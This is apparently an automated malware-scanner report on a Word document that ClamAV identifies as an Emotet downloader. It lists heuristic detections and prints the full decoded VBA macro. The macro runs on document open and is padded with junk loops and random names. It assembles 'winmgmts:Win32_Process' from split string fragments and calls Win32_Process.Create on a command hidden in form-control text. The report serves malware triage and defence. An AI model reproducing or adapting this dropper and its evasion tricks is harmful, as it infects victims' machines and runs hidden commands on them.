MALICIOUS
Risk Score: 232
Heuristics: 8

- ClamAV: Doc.Downloader.Emotet-7448070-0 (critical) [CLAMAV_DETECTION]
  ClamAV detected this file as malware: Doc.Downloader.Emotet-7448070-0
- VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]
  Document contains VBA macro code.
- Dangerous API name reassembled from split string literals (critical) [OLE_VBA_SPLIT_KEYWORD_OBFUSCATION]
  VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  Matched line in script: Set Fsxhtqbmcttq = CreateObject(Qoqtiqet)
- CreateObject call (high) [OLE_VBA_CREATEOBJ]
  CreateObject call.
  Matched line in script: Set Fsxhtqbmcttq = CreateObject(Qoqtiqet)
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low) [OLE_VBA_DOCOPEN]
  Document_Open macro.
  Matched line in script: Private Sub Document_open()
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8720 bytes |

SHA-256: 4eeb04229e81dfe706c59fc4a82ff604bc40edff259d24b105b2e1e8b800c71c

Detection (macros.bas):
- ClamAV: No threats found
- Obfuscation or payload: likely. 151 of 220 identifiers look randomly generated (e.g. 'Cdshzlsivtlne'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Vyvqzuvyv"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Cqwreudpec, 0, 0, MSForms, TextBox"
Private Sub Document_open()
For Nehjkaim = Mplkjouk To 0
For Soignsrc = Syhpjurvr To 0
Ederxwdu = (23 + Round(WOJOkxR3))
Next
Vasjzvavsifhz = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Ivapwytobol = uzH To MZDUoaj1
Qvoibjwxogk = ChrB(dANsZ68a4)
Next
For Ayuvxdscpad = 0 To 0
Zclrvnrle = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
For Psimvmgqagtar = Ihhagvdzy To 0
For Bemxxwsketxji = Bjviscftlbtfd To 0
Tjxzlcecjx = (23 + Round(WOJOkxR3))
Next
Ymlxyriuu = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Wtwkbwdqpit = uzH To MZDUoaj1
Mjxvxhmkkvg = ChrB(dANsZ68a4)
Next
For Duovhrpt = 0 To 0
Ordffhsyf = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
For Prokwsaysy = Ibhsmjrhkgem To 0
For Ngfpxxobrlwbg = Qpzejykjeaxip To 0
Mbryeusdbx = (23 + Round(WOJOkxR3))
Next
Jvwkcnhtr = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Jzdxaozpyb = uzH To MZDUoaj1
Ujizfxlygdrbn = ChrB(dANsZ68a4)
Next
For Uvigshthzbw = 0 To 0
Biifawbauoc = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Kekzylcfmlzal
End Sub
Attribute VB_Name = "Eqgqcukkqs"
Attribute VB_Base = "0{21FB5824-F079-4E17-8E1E-3180FAE51311}{E9A9A18F-FA77-4D29-BE77-0B4E0B3540B2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Bvktkpmcp"
Function Gvrewgkb()
For Febkcapmgqor = Dtmpuwwphqai To 0
For Ppxtqzleg = Vmeesqwxpz To 0
Mxdyqwkkuzhxr = (23 + Round(WOJOkxR3))
Next
Amjymsgyjrko = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Klitrlvn = uzH To MZDUoaj1
Hwjovfhnzvvl = ChrB(dANsZ68a4)
Next
For Jffzthfi = 0 To 0
Jozdahznl = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Fgalqfiwcdkn = Vyvqzuvyv.Cqwreudpec
For Ggfuxnlyp = Istpqcarsxv To 0
For Mvwczlcpvrkxa = Jtmhrmqvbbyoz To 0
Kkmhicqi = (23 + Round(WOJOkxR3))
Next
Pxmbjrql = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Ylnckvaub = uzH To MZDUoaj1
Cdshzlsivtlne = ChrB(dANsZ68a4)
Next
For Dusjhdxeezw = 0 To 0
Mbwhxgmutukgx = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Spucpfsgd = Fgalqfiwcdkn + Eqgqcukkqs.Bznaxyfwp + Eqgqcukkqs.Zkvepwts + Eqgqcukkqs.Rygksenvkbp
For Yeoyziucy = Axzlpxcvtrnh To 0
For Kgepovubccer = Aynkrmowuqi To 0
Rqrlxifocp = (23 + Round(WOJOkxR3))
Next
Kzyuxhxbnv = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Cptfoloh = uzH To MZDUoaj1
Dllrgirayj = ChrB(dANsZ68a4)
Next
For Gmpbxike = 0 To 0
Vnjhpazqafbav = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Cvukvxnunvnbd = Spucpfsgd + Eqgqcukkqs.Ydoehzjxowhl + Eqgqcukkqs.Ejxfdtxi.ControlTipText
For Asddhtgzbw = Cewtwsfwgp To 0
For Tyxclnzjm = Kmkmcrbh To 0
Vkvdqjvasfkgy = (23 + Round(WOJOkxR3))
Next
Vdooxawfbl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Fdeeifexnc = uzH To MZDUoaj1
Dejuqseobego = ChrB(dANsZ68a4)
Next
For Izzftsjypwoa = 0 To 0
Tmvtftkt = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Gvrewgkb = Eeucouafvnce + Cvukvxnunvnbd + Eeucouafvnce
For Lhgdygaw = Ndlebqrgts To 0
For Qmhxsotndnnd = Spfruwhxjdv To 0
Cfobzftruwanm = (23 + Round(WOJOkxR3))
Next
Gzphmnybbbx = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Tddbaqrhpm = uzH To MZDUoaj1
Yxytfdhttqjnn = ChrB(dANsZ68a4)
Next
For Denzcgjxqs = 0 To 0
Wlfrnbknpz = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
End Function
Function Kekzylcfmlzal()
For Uelqbvidpr = Bohnuerrdblig To 0
For Kmrsdjzje = Jormgnlcull To 0
Fcehstdkgox = (23 + Round(WOJOkxR3))
Next
Yvnbfdpdvdzqu = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Davypamberqlu = uzH To MZDUoaj1
Ztviopps = ChrB(dANsZ68a4)
Next
For Inkzerxugg = 0 To 0
Ycxltikoruws = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Qoqtiqet = "wi" + "nmgmt" + "s:" + "Win3" + "2_" + Vyvqzuvyv.Cqwreudpec + "r" + "oc" + "ess" + I
For Yyvqhuux = Jcnkxdkcnzkf To 0
For Uqoytaebohj = Ikcpjpky To 0
Xazavmtt = (23 + Round(WOJOkxR3))
Next
Gvqgwemphoga = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Crkjbquprpqxt = uzH To MZDUoaj1
Punrjxmtwt = ChrB(dANsZ68a4)
Next
For Vrpuwfax = 0 To 0
Kscyrebp = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Set Fsxhtqbmcttq = CreateObject(Qoqtiqet)
For Tzzpzaknfmmoe = Ulctsbzagyt To 0
For Uvloitsbfty = Jcsuhxtueur To 0
Vuysqgits = (23 + Round(WOJOkxR3))
Next
Xfklnpse = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Sximrvyw = uzH To MZDUoaj1
Tacyycmc = ChrB(dANsZ68a4)
Next
For Xqrqxbniho = 0 To 0
Ofcwqgzlkxc = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Tcombooa = Qoqtiqet + Eqgqcukkqs.Dftrfqydwcc.ControlTipText + Eqgqcukkqs.Ebmbegep.ControlTipText
For Kfkvvknpubh = Vgpsnizrbt To 0
For Ltqbrzzrmcxzk = Kfqgejcc To 0
Yrmsxilvvjqwn = (23 + Round(WOJOkxR3))
Next
Ibztjpit = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Llmlpjqocsh = uzH To MZDUoaj1
Otleokkornevi = ChrB(dANsZ68a4)
Next
For Skqyfdmxyj = 0 To 0
Ailkuvcl = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Dotvjnsq = Tcombooa + Vyvqzuvyv.Cqwreudpec
For Znzjhjjnrwif = Exgwnbfsopzf To 0
For Zhucbcycaep = Qacidtcwnk To 0
Lngykjbtv = (23 + Round(WOJOkxR3))
Next
Bgdbucxbgw = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Rmgvlmrmxax = uzH To MZDUoaj1
Rdpvnwncqac = ChrB(dANsZ68a4)
Next
For Iupjnitzpmeo = 0 To 0
Ecmbinmcz = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Set Kekzylcfmlzal = CreateObject(Dotvjnsq)
For Jbvhenmdz = Asmqjhdgrlxl To 0
For Nqlktvurpejn = Nchripbveveu To 0
Cvlpnnrwatgd = (23 + Round(WOJOkxR3))
Next
Dhgwajspeg = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Srlqfzlyptst = uzH To MZDUoaj1
Crbolfqsswoi = ChrB(dANsZ68a4)
Next
For Cmrflvuz = 0 To 0
Ngratjpmxh = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Kekzylcfmlzal.XSize = False
For Ljcfwseoh = Tcgtjoieho To 0
For Ezjhcdjqdn = Qobdtpdm To 0
Isflswzgwtb = (23 + Round(WOJOkxR3))
Next
Gnlblyiigyfdv = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Krkyfqqqc = uzH To MZDUoaj1
Mrxqkzrquq = ChrB(dANsZ68a4)
Next
For Snwfbuzhwju = 0 To 0
Icuhqwika = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Kekzylcfmlzal.YSize = False
For Leklcstdgt = Htkfuelqzq To 0
For Gzkwkoxccs = Eklbjxtoq To 0
Wyjcgerlutbf = (23 + Round(WOJOkxR3))
Next
Xssvjgosf = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Skhcxwszen = uzH To MZDUoaj1
Lrxlggkd = ChrB(dANsZ68a4)
Next
For Tmeashbget = 0 To 0
Nukjxxigxuzr = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
Do While Fsxhtqbmcttq.Create(Null & Gvrewgkb, Didilyscvz, Kekzylcfmlzal)
Loop
For Njsyqmnrmg = Moopkigmgzx To 0
For Rytovjbjh = Pepmdrzwbcem To 0
Vwtmfnlnrzn = (23 + Round(WOJOkxR3))
Next
Rwlefrua = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
For Tjoaacemmrya = uzH To MZDUoaj1
Wcjibnqyj = ChrB(dANsZ68a4)
Next
For Aqxzuiqpd = 0 To 0
Qnlkmmac = 43 * CInt(45 - CSng(jUnR69) - 11)
Next
Next
End Function